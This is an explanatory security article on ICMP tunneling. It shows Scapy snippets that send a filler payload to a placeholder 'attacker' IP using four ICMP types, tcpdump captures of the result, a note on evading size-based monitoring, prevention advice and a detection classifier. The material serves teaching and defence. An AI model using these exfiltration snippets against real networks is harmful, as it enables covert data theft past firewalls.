ICMP Tunneling
Updated: Jan 25, 2023
Introduction
Internet Control Message Protocol (ICMP) is a communication protocol used to diagnose and troubleshoot network issues. It is used to send messages between hosts and routers on an IP network. ICMP can also be used to tunnel data, which is a technique used to bypass firewalls and other security measures. ICMP tunneling is a form of data exfiltration that uses ICMP messages to send data from one host to another. This article will discuss the basics of ICMP tunneling, provide examples of ICMP tunneling using different types of ICMP messages, and provide recommendations to prevent ICMP tunneling.
What is ICMP Tunneling?
ICMP tunneling is a technique used to bypass firewalls and other security measures. It uses ICMP messages to send data from one host to another. Because the data is encapsulated in the payload of the ICMP message, it is difficult for firewalls to detect and block. ICMP tunneling is often used to exfiltrate data from a network or to reach a network that is otherwise inaccessible.
Types of ICMP Tunneling
ICMP tunneling can be done using different types of ICMP messages. In each case the data is encapsulated in the payload of the ICMP message. These include:
• Echo request (ping, type 8): the most common type of ICMP tunneling, carrying the data in the payload of an echo request.
• Echo reply (type 0): carries the data in the payload of an echo reply message.
• Time exceeded (type 11): carries the data in the payload of a time exceeded message.
• Destination unreachable (type 3): carries the data in the payload of a destination unreachable message.
Examples of ICMP Tunneling Using Scapy
Scapy is a powerful Python-based network packet manipulation program. It can be used to craft and send ICMP messages for ICMP tunneling. Here are some examples of ICMP tunneling using different types of ICMP messages with Scapy. For these examples, the attacker machine's IP address is 192.168.1.1 and the target machine's IP address is 192.168.1.2:
• Send Data to Attacker IP via Echo Request (Ping):
from scapy.all import *
packet = IP(dst="192.168.1.1")/ICMP(type=8, code=0)/Raw(load="AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000")
send(packet)
• Send Data to Attacker IP via Echo Reply:
from scapy.all import *
packet = IP(dst="192.168.1.1")/ICMP(type=0, code=0)/Raw(load="AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000")
send(packet)
• Send Data to Attacker IP via Time Exceeded:
from scapy.all import *
packet = IP(dst="192.168.1.1")/ICMP(type=11, code=0)/Raw(load="AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000")
send(packet)
• Send Data to Attacker IP via Destination Unreachable:
from scapy.all import *
packet = IP(dst="192.168.1.1")/ICMP(type=3, code=0)/Raw(load="AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000")
send(packet)
On the receiving side, the attacker can capture the ICMP payload with tcpdump, Scapy, or a similar tool:
$ sudo tcpdump -i eth0 -XX -n 'icmp and src 192.168.1.2'
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
16:39:15.130872 IP 192.168.1.2 > 192.168.1.1: ICMP echo request, id 0, seq 0, length 64
0x0000: f875 a4a3 fbce 3c97 0e01 853f 0800 4500 .u....<....?..E.
0x0010: 0054 0001 0000 4001 608b 0a03 0309 0a03 .T....@.`.......
0x0020: 030f 0000 cfe4 0000 0000 4141 4141 4141 ..........AAAAAA
0x0030: 4141 4242 4242 4242 4242 4343 4343 4343 AABBBBBBBBCCCCCC
0x0040: 4343 4444 4444 4444 4444 4545 4545 4545 CCDDDDDDDDEEEEEE
0x0050: 4545 4546 4646 4646 4646 4630 3030 3030 EEEFFFFFFFF00000
0x0060: 3030 00
Note that the ICMP packet above carries 56 bytes of custom data, which makes it exactly the same size as a default ping packet; this may allow an attacker to circumvent monitoring that detects ICMP tunneling or exfiltration by packet size alone. For comparison, here is a default ping captured the same way:
$ sudo tcpdump -i eth0 -XX -n 'icmp and src 192.168.1.2'
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
16:39:15.130872 IP 192.168.1.2 > 192.168.1.1:ICMP echo request, id 26906, seq 1, length 64
0x0000: f875 a4a3 fbce 3c97 0e01 853f 0800 4500 .u....<....?..E.
0x0010: 0054 fa48 4000 4001 2643 0a03 0309 0a03 .T.H@.@.&C......
0x0020: 030f 0800 2b31 691a 0001 bc78 d163 0000 ....+1i....x.c..
0x0030: 0000 1204 0500 0000 0000 1011 1213 1415 ................
0x0040: 1617 1819 1a1b 1c1d 1e1f 2021 2223 2425 ...........!"#$%
0x0050: 2627 2829 2a2b 2c2d 2e2f 3031 3233 3435 &'()*+,-./012345
0x0060: 3637 67
Prevent ICMP Tunneling
ICMP tunneling can be prevented by using a firewall to block ICMP messages. Some tools can also detect and block ICMP tunneling, including packet sniffers, intrusion detection systems, and antivirus software. The default size of a single ICMP packet is typically 64 bytes, so any ICMP packet of a different size may warrant further investigation. As the two captures above show, however, a tunnel that pads its payload to the default size will not stand out by size alone, so the payload contents should be inspected as well.
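To show what the size-based heuristic above does and does not catch, here is an added detection example (not part of the original article) that classifies raw ICMP messages laid out like the two tcpdump captures. It assumes the Linux ping fill pattern visible in the second capture (a 16-byte timestamp followed by the bytes 0x10 through 0x37) as the baseline for a genuine echo, and it checks that error messages quote a real IPv4 header; the sample packets are constructed inline.

```python
import struct

# Baseline from the default-ping capture above: Linux ping fills its 56-byte
# payload with a 16-byte timeval followed by the bytes 0x10, 0x11, ..., 0x37.
LINUX_PING_PATTERN = bytes(range(0x10, 0x38))  # 40 bytes; 16 + 40 = 56
# The 56-byte payload used by the Scapy examples on this page.
CUSTOM = b"AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEFFFFFFFF0000000"

def classify_icmp(icmp: bytes) -> str:
    """Return 'ok' or the reason an ICMP message looks like a tunnel carrier."""
    if len(icmp) < 8:
        return "truncated ICMP header"
    icmp_type, payload = icmp[0], icmp[8:]
    if icmp_type in (8, 0):  # echo request / echo reply
        # Size alone is not enough: the Scapy example is exactly default-sized
        # (8-byte header + 56 = 64), so also compare the fill pattern.
        if len(payload) != 56:
            return "echo payload is %d bytes, not the 56-byte default" % len(payload)
        if payload[16:] != LINUX_PING_PATTERN:
            return "echo payload is default-sized but the fill pattern differs"
        return "ok"
    if icmp_type in (3, 11):  # destination unreachable / time exceeded
        # RFC 792: these quote the offending IPv4 header plus 8 bytes of its data,
        # so a genuine one starts with version 4 and a header length >= 5 words.
        if len(payload) < 28:
            return "error message does not quote a full IP header"
        version, ihl = payload[0] >> 4, payload[0] & 0x0F
        if version != 4 or ihl < 5:
            return "error message payload is not a quoted IPv4 header"
        return "ok"
    return "unexpected ICMP type %d" % icmp_type

def build_echo(icmp_type: int, payload: bytes, ident: int = 0, seq: int = 0) -> bytes:
    # Checksum left as zero; the classifier never looks at it.
    return struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload

def build_error(icmp_type: int, payload: bytes) -> bytes:
    return struct.pack("!BBHI", icmp_type, 0, 0, 0) + payload

# Constructed samples: one genuine default ping and three of the Scapy variants.
SAMPLES = {
    "default ping": build_echo(8, bytes(16) + LINUX_PING_PATTERN, 26906, 1),
    "scapy echo request": build_echo(8, CUSTOM),
    "scapy echo reply": build_echo(0, CUSTOM),
    "scapy destination unreachable": build_error(3, CUSTOM),
}

def scan(samples: dict) -> dict:
    # Only the flagged samples are returned, each with its reason.
    return {n: r for n, p in samples.items() if (r := classify_icmp(p)) != "ok"}
```

The baseline is specific to Linux ping; other implementations (for example the 32-byte payload Windows ping sends) need their own baseline or they will be reported as non-default.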
Conclusion
ICMP tunneling is a technique used to bypass firewalls and other security measures. It uses ICMP messages to send data from one host to another. This article discussed the basics of ICMP tunneling, provided examples of ICMP tunneling using different types of ICMP messages with Scapy, showed how the data can be captured with tcpdump, and gave recommendations for preventing ICMP tunneling.